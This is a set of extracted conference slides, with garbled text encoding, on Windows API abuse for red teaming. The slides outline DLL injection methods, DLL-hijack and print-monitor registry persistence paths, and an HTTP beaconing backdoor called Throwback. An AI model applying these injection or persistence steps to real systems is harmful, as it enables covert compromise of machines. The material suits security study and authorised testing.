Ge#ng&Windows&to&Play&with&Itself A"Hacker’s"Guide"to"Windows"API"Abuse" " Brady"Bloxham" Founder/Principal"Security"Consultant" @silentbreaksec" hCp://www.silentbreaksecurity.com" hCp://www.blacksquirrel.io"" Background •  Shorten"the"gap"between" penetraHon"test"and"actual"aCack" •  Few"covert"persistence"tools" • Reduce"reliance"on"Metasploit" Got&a&lot&to&cover • DLL"InjecHon" • Persistence" •  Throwback" •  Lots"of"demos"along"the"way" DLL&Injec?on •  TradiHonal"methods" •  CreateRemoteThread()" •  NtCreateThreadEx()" •  RtlCreateUserThread()" •  NtQueueApcThread"()" •  Can"blue"screen"certain"OSes" •  Code"Cave" •  Suspend"process" •  Inject"code" •  Change"EIP"to"locaHon"of"injected"code" •  Resume"process" •  Difficult"on"x64" AddMonitor() •  +" •  Injects"into"spoolsv.exe" •  Doesn’t"require"matching"" architecture" •  Easy"to"use" •  \" •  Dll"must"be"on"disk" •  Requires"administrator"privs" Dll&Injec?on&Demo Persistence •  Lots"of"persistence"in"Windows" •  Service"" •  Run"keys" •  Schtasks" •  …" • And"lots"sHll"to"find…" •  Lots"of"techniques" •  Process"monitor" •  Hook"LoadLibrary()" 2884 'ACreateFile 2884 EACloseFile 2884 EACreatefile 2884 Bi Load Image 2884 BACloseFile 2884 & 2884 EACloseFile 2884 WACreatefile 2884 Bi Load Image 2884 EACloseFile 2884 BA CreateFile 2884 BACloseFile 2884 [A QueryBasicinformation File 2884 A CreateFileMapping 2884 ACreateFile Mapping 2884 [A QueryBasicinformation File 2884 ACreateFile Mapping 2884 A CreateFileMapping 2884 [A QueryBasicinformationFile C:\Windows\System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows \System32\wbem \fastprox.dll C:\Windows\System32\wbem\NTDSAPI.dli C:\Windows \System32\ntdsapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows \System32\ntdsapi.dll C:\Windows \System32\ntdsapi.dll C:\Windows \System32\ntdsapi.dll C:\Windows\\System32\ntdsapi.dll C:\Windows \System32\comsvcs.dll C:\Windows\System32\comsvcs.dll C:\Windows\System32\comsvcs.dll SUCCESS SUCCESS SUCCESS SUCCESS FILE LOCKED WI... SUCCESS SUCCESS SUCCESS NAME NOT FOUND Desired Access: Read Attributes, Dispositio SUCCESS SUCCESS SUCCESS SUCCESS FILE LOCKED WI... SUCCESS SUCCESS SUCCESS SUCCESS SUCCESS SUCCESS Desired Access: Read Attributes, Dispositior Creation Time: 7/13/2009 5:47:53 PM, Last, Desired Access: Read Data/List Directory, | Sync Type: SyncTypeCreateSection, PageP Sync Type: Sync TypeOther Image Base: Ox7fef$ca0000, Image Size: O Desired Access: Read Attributes, Dispositior Creation Time: 7/13/2009 5:54:08 PM, Last, Desired Access: Read Data/List Directory, | Sync Type: Sync TypeCreateSection, PageP Sync Type: Sync TypeOther Image Base: Ox 7fef7770000, Image Size: 0 Desired Access: Read Attributes, Dispositior Creation Time: 7/13/2009 6:01:16 PM, Last: Persistence •  1st"Technique" •  Requires"VMware"Tools"be"installed" •  Just"drop"a"dll"to"disk" •  c:\windows\system32\wbem\ntdsapi.dll" •  Note:"Dll"must"export"same"funcHons"as"" real"ntdsapi.dll" •  2nd"Technique" •  VMware"patched"in"ESXi"5.5" •  Requires"VMware"Tools"be"installed"" •  Just"drop"a"dll"to"disk" •  c:\windows\system32\wbem\tpgenlic.dll" •  c:\windows\system32\wbem\thinmon.dll" Windows( Persistence •  3rd"Technique" •  HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\" •  Create"a"new"key"" •  Create"a"new"value"named"Driver"with"the"dll"name" •  Create"as"many"as"you"like" Persistence&Demo Windows&API&HTTP&Cheatsheet • WinHTTP" •  Intended"for"services" •  Does"not"pull"user"proxy"seings" •  Supports"impersonaHon" • WinINet" •  More"robust"in"proxy"environment"" •  Variety"of"flags"that"enable/disable"funcHonality"automaHcally" •  Prompts"user"for"password"if"authenHcaHon"is"required" •  Uses"IE"seings" What&is&Throwback? • C++"HTTP/S"beaconing"backdoor" • PHP"control"panel"w/"MySQL"backend" • Built"for"stealth" • Persistence"built\in" •  Dll"" •  Exe" Infected(User ( Proxy(/(Firewall ThrowbackLP Attacker ThrowbackLP Throwback&Features •  Robust"proxy"detecHon" •  Distributed"LPs"" •  Uses"MSGRPC"to"generate"MSF"payloads" •  RC4"encrypted"comms"" •  Implements"reflecHve"dll"injecHon" •  String"encrypHon" Throwback Control Panel kl RO WwW Home MetCreator Logout BACK silentobreaksecurity.io Action Command Arguments ae Current time is Aug 5, 2014 4:54 pm. Callback Status Version IP Address Target Name Period Last Callback Actions ps Pin 4 2.50 192.168.20.183 IETEMPLATE 1 minutes Aug 5, 2014 4-04 pm El History @ Radar A 2.50 192.168.20.1 IE11TEMPLATE 1 minutes Aug 4, 2014 10:35 pm El History @ Radar A = 2.16 192.168.20.1 IE10TEMPLATE 1 minutes Aug 2, 2014 12:28 am El History @ Radar ps Pin 4 2.16 192.168.20.112 IE9STEMPLATE 10 minutes Aug 1, 2014 5-55 pm El History @ Radar Throwback&Demo Going&Forward… • Community"based"project!!!" • Create"modules" •  Keylogger,"Mimikatz,"Hashdump,"etc." •  Various"transport"methods" • AddiHonal"persistence"techniques" • ModificaHon"of"comms" The&End&Shameless&Plug •  Interested"in"wriHng"custom"malware/backdoors?" •  Dark"Side"Ops:"Custom"PenetraHon"TesHng" •  Blackhat"Europe"and"East"Coast"Trainings" •  Pen"test"networks"from"your"browser" •  hCps://www.blacksquirrel.io" " •  Silent"Break"Security" •  Blackbox/Red"Team"Pen"TesHng" •  brady@silentbreaksecurity.com" •  @silentbreaksec" •  hCps://github.com/silentbreaksec"